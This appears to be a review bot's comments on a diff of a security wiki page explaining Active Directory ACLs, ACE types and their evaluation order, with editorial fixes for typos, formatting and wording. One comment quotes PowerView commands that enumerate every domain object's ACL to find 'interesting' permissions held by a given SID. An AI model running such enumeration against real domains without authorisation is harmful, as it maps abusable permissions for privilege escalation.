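Review bot: the comments carried into the restructured block keep the typos "intresting", "permisions" and "founds is realated" (`#Find intresting ACEs (Interesting permisions of "unexpected objects" ...` and `#Check if any of the interesting permissions founds is realated to a username/group`); since these lines are being rewritten anyway, fix them to "interesting", "permissions" and "found is related". The block is fenced as ```bash although every command in it is PowerShell (PowerView), so tag it ```powershell like the other blocks in this file. Two smaller points: `#Get permissions of a file` sits above a share path (`\\dc.mydomain.local\sysvol`), so "file or share path" is more accurate, and the new `Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}` reads the ACL of every object in the domain before filtering, which deserves a comment so readers expect it to be slow and to generate a large volume of LDAP reads in big domains.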
@ -22,7 +22,7 @@ Get Access Today:

## **Access Control List (ACL)**

An **ACL is an ordered list of ACEs** that define the protections that apply to an object and its properties. Each ACE identifies a security principal and specifies a set of access rights that are allowed, denied, or audited for that security principal.
An **ACL is an ordered list of ACEs** that define the protections that apply to an object and its properties. Each **ACE** identifies a security **principal** and specifies a **set of access** rights that are allowed, denied, or audited for that security principal.

An object’s security descriptor can contain **two ACLs**:

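Review bot: the only change to this sentence is added bold, and `**set of access** rights` cuts the phrase in half; bold the whole term, `**set of access rights**`, so the emphasis covers what is actually being defined. The sentence is otherwise identical to the line it replaces, so the diff would be easier to review if the commit said the intent is an emphasis pass.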
@ -49,6 +49,23 @@ When a thread tries to access a securable object, the LSASS (Local Security Auth

If the LSASS finds ACEs, it compares the trustee SID in each ACE to the trustee SIDs that are identified in the thread's access token.

### ACEs

There are **`three` main types of ACEs** that can be applied to all securable objects in AD:

| **ACE** | **Description** |
| ------------------------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **`Access denied ACE`** | Used within a DACL to show that a user or group is explicitly denied access to an object |
| **`Access allowed ACE`** | Used within a DACL to show that a user or group is explicitly granted access to an object |
| **`System audit ACE`** | Used within a SACL to generate audit logs when a user or group attempts to access an object. It records whether access was granted or not and what type of access occurred |

Each ACE is made up of the following `four` components:

1. The security identifier (SID) of the user/group that has access to the object (or principal name graphically)
2. A flag denoting the type of ACE (access denied, allowed, or system audit ACE)
3. A set of flags that specify whether or not child containers/objects can inherit the given ACE entry from the primary or parent object
4. An [access mask](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-dtyp/7a53f60e-e730-4dfe-bbe9-b21b62eb790b?redirectedfrom=MSDN) which is a 32-bit value that defines the rights granted to an object

The system examines each ACE in sequence until one of the following events occurs:

* **An access-denied ACE explicitly denies** any of the requested access rights to one of the trustees listed in the thread's access token.
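Review bot: item 4 of the components list says the access mask "defines the rights granted to an object"; the mask defines the rights the ACE allows or denies to the trustee named in item 1 on that object, so "the rights allowed or denied to the trustee on the object" is the accurate wording (and it matches the allowed/denied split in the table above). Smaller points: "**`three` main types**" and "`four` components" put plain numbers in code font, and the parenthetical in item 1, "(or principal name graphically)", is unclear; "or, in graphical tools, the resolved principal name" says what is meant.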
@ -76,6 +93,8 @@ The canonical order ensures that the following takes place:
* An explicit **access-denied ACE is enforced regardless of any explicit access-allowed ACE**. This means that the object's owner can define permissions that allow access to a group of users and deny access to a subset of that group.
* All **explicit ACEs are processed before any inherited ACE**. This is consistent with the concept of discretionary access control: access to a child object (for example a file) is at the discretion of the child's owner, not the owner of the parent object (for example a folder). The owner of a child object can define permissions directly on the child. The result is that the effects of inherited permissions are modified.



![](<../../.gitbook/assets/image (9) (1) (2).png>)

\
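Review bot: the added figure `![](<../../.gitbook/assets/image (9) (1) (2).png>)` has empty alt text, so nothing describes it when the image fails to load or the page is read as text; give it a short alt that matches the section, for example "canonical ordering of ACEs in a DACL". The `\` on the line after it is a GitBook hard line break with nothing following, so it only adds an empty trailing break and can be dropped, as can two of the three blank lines above the image.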